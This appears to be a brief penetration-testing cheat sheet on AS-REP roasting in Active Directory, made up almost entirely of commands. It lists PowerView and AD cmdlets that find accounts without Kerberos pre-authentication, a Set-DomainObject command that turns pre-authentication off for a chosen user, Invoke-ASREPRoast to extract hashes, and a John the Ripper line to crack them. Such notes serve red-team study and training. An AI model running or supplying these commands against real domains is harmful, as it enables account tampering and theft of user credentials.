Enumerating accounts with Kerberos pre-authentication disabled
Get-DomainUser -PreauthNotRequired -Verbose
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth
Set-DomainObject -Identity <User> -XOR @{useraccountcontrol=4194304} -Verbose
Get-ASREPHash -UserName VPN1user -Verbose Invoke-ASREPRoast -Verbose
john.exe --wordlist=passwords.txt asrephashes.txt
Last updated 6 months ago